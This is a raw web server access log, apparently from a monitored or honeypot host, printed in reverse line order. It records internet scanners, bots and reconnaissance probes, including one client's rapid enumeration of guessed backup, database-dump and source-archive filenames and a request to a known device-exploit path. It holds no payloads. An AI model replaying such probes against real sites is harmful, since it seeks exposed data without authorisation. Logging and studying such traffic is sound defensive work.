RemoteAddr: 51.158.203.232:48203
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-04-05 00:51:34] === HTTP Request ===
[2026-04-05 00:51:34] Main page accessed - IP: 51.158.203.232:48203
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.203.232:48203
Path: /
URL: /
Method: GET
[2026-04-05 00:51:34] === HTTP Request ===
[2026-04-05 00:51:32] Main page accessed - IP: 51.158.203.232:35996
===================
Accept: */*
User-Agent: curl/7.81.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.203.232:35996
Path: /
URL: /
Method: HEAD
[2026-04-05 00:51:32] === HTTP Request ===
[2026-04-04 23:50:31] Main page accessed - IP: 194.88.98.84:37930
===================
Connection: close
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; Infrawatch/1.0; +https://infrawat.ch/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 194.88.98.84:37930
Path: /
URL: /
Method: GET
[2026-04-04 23:50:31] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Connection: close
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 45.135.194.113:48618
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-04-04 22:44:46] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 45.135.194.113:48616
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-04-04 22:44:46] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 45.135.194.113:48596
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-04-04 22:44:45] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.46:55192
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-04 22:04:29] === HTTP Request ===
[2026-04-04 22:04:29] Main page accessed - IP: 85.217.140.46:55176
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.46:55176
Path: /
URL: /
Method: GET
[2026-04-04 22:04:29] === HTTP Request ===
[2026-04-04 21:46:45] Main page accessed - IP: 172.30.0.12:36992
===================
X-Forwarded-For: 204.76.203.25
Via: 1.1 Caddy
Accept-Encoding: identity
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36992
Path: /
URL: /
Method: GET
[2026-04-04 21:46:45] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.226:59630
Path: /config
URL: /config
Method: GET
[2026-04-04 21:32:43] === HTTP Request ===
[2026-04-04 20:54:14] Main page accessed - IP: 64.226.86.7:36586
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 64.226.86.7:36586
Path: /
URL: /
Method: GET
[2026-04-04 20:54:14] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.12:36836
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-04 20:47:06] === HTTP Request ===
[2026-04-04 20:47:06] Main page accessed - IP: 85.142.100.12:36826
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.12:36826
Path: /
URL: /
Method: GET
[2026-04-04 20:47:06] === HTTP Request ===
[2026-04-04 20:47:06] Main page accessed - IP: 85.142.100.12:52337
===================
Accept: */*
User-Agent: User-Agent ("Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)")
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 85.142.100.12:52337
Path: /
URL: /
Method: GET
[2026-04-04 20:47:06] === HTTP Request ===
===================
Connection: keep-alive
Accept-Encoding: gzip, deflate, gzip, deflate
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:10082
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-04-04 19:47:22] === HTTP Request ===
[2026-04-04 19:39:05] Main page accessed - IP: 198.235.24.143:59628
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.143:59628
Path: /
URL: /
Method: GET
[2026-04-04 19:39:05] === HTTP Request ===
[2026-04-04 19:04:05] Main page accessed - IP: 205.210.31.66:56535
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 205.210.31.66:56535
Path: /
URL: /
Method: GET
[2026-04-04 19:04:05] === HTTP Request ===
[2026-04-04 18:36:27] Main page accessed - IP: 172.30.0.12:38560
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 195.178.110.64
Via: 1.1 Caddy
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:38560
Path: /
URL: /
Method: GET
[2026-04-04 18:36:27] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Accept-Language: en
X-Forwarded-Host: admin.vulnberries.ru
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /source.tar.gz
URL: /source.tar.gz
Method: GET
[2026-04-04 18:32:17] === HTTP Request ===
===================
Accept-Language: en
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-For: 45.135.134.64
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /source.zip
URL: /source.zip
Method: GET
[2026-04-04 18:32:17] === HTTP Request ===
===================
X-Forwarded-Proto: https
Via: 1.1 Caddy
Accept-Encoding: gzip
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Accept-Language: en
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.4.22
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /database.tar.gz
URL: /database.tar.gz
Method: GET
[2026-04-04 18:32:17] === HTTP Request ===
===================
X-Forwarded-For: 45.135.134.64
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1	20.51
Accept-Encoding: gzip
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Accept-Language: en
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /database.zip
URL: /database.zip
Method: GET
[2026-04-04 18:32:17] === HTTP Request ===
===================
X-Forwarded-Proto: https
Accept-Language: en
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /db.sql
URL: /db.sql
Method: GET
[2026-04-04 18:32:17] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept-Language: en
Accept: */*
User-Agent: Mozilla/5.0 (SS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /db.zip
URL: /db.zip
Method: GET
[2026-04-04 18:32:17] === HTTP Request ===
===================
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Accept: */*
User-Agent: Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: en
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /dump.sql
URL: /dump.sql
Method: GET
[2026-04-04 18:32:17] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Accept-Language: en
Accept-Encoding: gzip
Accept: */*
X-Forwarded-Proto: https
Via: 1.1 Caddy
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.2.19
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /dump.tar.gz
URL: /dump.tar.gz
Method: GET
[2026-04-04 18:32:17] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-Proto: https
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Accept-Language: en
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /dump.zip
URL: /dump.zip
Method: GET
[2026-04-04 18:32:16] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /main.zip
URL: /main.zip
Method: GET
[2026-04-04 18:32:16] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
X-Forwarded-Proto: https
X-Forwarded-For: 45.135.134.64
Accept-Language: en
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /web.zip
URL: /web.zip
Method: GET
[2026-04-04 18:32:16] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: en
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept-Encoding: gzip
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /site.tar.gz
URL: /site.tar.gz
Method: GET
[2026-04-04 18:32:16] === HTTP Request ===
===================
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Accept-Language: en
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (CentOS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /site.zip
URL: /site.zip
Method: GET
[2026-04-04 18:32:16] === HTTP Request ===
===================
Accept-Language: en
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 \(Windows NT 10.0\; Win64\; x64\) AppleWebKit/537.36 \(KHTML, like Gecko\) Chrome/100.0.4896.60 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
X-Forwarded-Proto: https
Via: 1.1 Caddy
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /backup.tgz
URL: /backup.tgz
Method: GET
[2026-04-04 18:32:16] === HTTP Request ===
===================
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Accept-Language: en
Accept-Encoding: gzip
Via: 1.1 Caddy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /backup.tar.gz
URL: /backup.tar.gz
Method: GET
[2026-04-04 18:32:16] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Accept-Language: en
Accept-Encoding: gzip
X-Forwarded-Proto: https
Via: 1.1 Caddy
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.6.23
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /backup.zip
URL: /backup.zip
Method: GET
[2026-04-04 18:32:16] === HTTP Request ===
===================
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept-Language: en
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /wwwroot.tar.gz
URL: /wwwroot.tar.gz
Method: GET
[2026-04-04 18:32:16] === HTTP Request ===
===================
X-Forwarded-Proto: https
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Accept-Language: en
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /wwwroot.zip
URL: /wwwroot.zip
Method: GET
[2026-04-04 18:32:15] === HTTP Request ===
===================
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /www.tar.gz
URL: /www.tar.gz
Method: GET
[2026-04-04 18:32:15] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Tokai/21.1.294403 Version/17.2 Safari/605.1.15
X-Forwarded-Proto: https
Accept-Language: en
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /www.zip
URL: /www.zip
Method: GET
[2026-04-04 18:32:15] === HTTP Request ===
===================
X-Forwarded-Proto: https
Via: 1.1 Caddy
Accept-Language: en
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.5.23
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /archive.rar
URL: /archive.rar
Method: GET
[2026-04-04 18:32:15] === HTTP Request ===
===================
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept-Encoding: gzip
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: en
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /archive.tgz
URL: /archive.tgz
Method: GET
[2026-04-04 18:32:15] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Via: 1.1 Caddy
Accept-Language: en
Accept: */*
X-Forwarded-For: 45.135.134.64
Accept-Encoding: gzip
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /archive.tar.gz
URL: /archive.tar.gz
Method: GET
[2026-04-04 18:32:15] === HTTP Request ===
===================
X-Forwarded-Proto: https
Via: 1.1 Caddy
Accept-Language: en
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /archive.zip
URL: /archive.zip
Method: GET
[2026-04-04 18:32:15] === HTTP Request ===
===================
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: en
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /public_html.7z
URL: /public_html.7z
Method: GET
[2026-04-04 18:32:15] === HTTP Request ===
===================
Via: 1.1 Caddy
Accept-Language: en
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /public_html.tgz
URL: /public_html.tgz
Method: GET
[2026-04-04 18:32:15] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Accept-Encoding: gzip
X-Forwarded-Proto: https
Accept-Language: en
Accept: */*
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /public_html.tar.gz
URL: /public_html.tar.gz
Method: GET
[2026-04-04 18:32:15] === HTTP Request ===
===================
Via: 1.1 Caddy
Accept-Language: en
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /public_html.zip
URL: /public_html.zip
Method: GET
[2026-04-04 18:32:15] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0
X-Forwarded-Proto: https
Accept-Language: en
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /vulnberries.ru.tgz
URL: /vulnberries.ru.tgz
Method: GET
[2026-04-04 18:32:14] === HTTP Request ===
===================
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Accept-Language: en
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /admin.vulnberries.ru.tgz
URL: /admin.vulnberries.ru.tgz
Method: GET
[2026-04-04 18:32:14] === HTTP Request ===
===================
Accept-Language: en
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /vulnberries.ru.tar.gz
URL: /vulnberries.ru.tar.gz
Method: GET
[2026-04-04 18:32:14] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept-Language: en
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /admin.vulnberries.ru.tar.gz
URL: /admin.vulnberries.ru.tar.gz
Method: GET
[2026-04-04 18:32:14] === HTTP Request ===
===================
Accept-Language: en
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Via: 1.1 Caddy
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /vulnberries.ru.zip
URL: /vulnberries.ru.zip
Method: GET
[2026-04-04 18:32:14] === HTTP Request ===
===================
X-Forwarded-Proto: https
Via: 1.1 Caddy
Accept-Language: en
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.135.134.64
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44674
Path: /admin.vulnberries.ru.zip
URL: /admin.vulnberries.ru.zip
Method: GET
[2026-04-04 18:32:14] === HTTP Request ===
[2026-04-04 17:55:19] Main page accessed - IP: 20.163.14.227:39084
===================
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 20.163.14.227:39084
Path: /
URL: /
Method: GET
[2026-04-04 17:55:19] === HTTP Request ===
[2026-04-04 14:26:08] Main page accessed - IP: 194.88.98.94:24130
===================
Connection: close
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; Infrawatch/1.0; +https://infrawat.ch/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 194.88.98.94:24130
Path: /
URL: /
Method: GET
[2026-04-04 14:26:08] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:50576
Path: /jars
URL: /jars
Method: GET
[2026-04-04 12:07:29] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.172.177:9508
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-04 10:47:49] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.172.177:9506
Path: *
URL: *
Method: PRI
[2026-04-04 10:47:47] === HTTP Request ===
[2026-04-04 10:47:46] Main page accessed - IP: 66.132.172.177:61258
===================
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.172.177:61258
Path: /
URL: /
Method: GET
[2026-04-04 10:47:46] === HTTP Request ===
[2026-04-04 10:43:39] Main page accessed - IP: 45.15.152.188:56433
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.15.152.188:56433
Path: /
URL: /
Method: GET
[2026-04-04 10:43:39] === HTTP Request ===
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-For: 74.7.241.183
From: oai-searchbot(at)openai.com
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
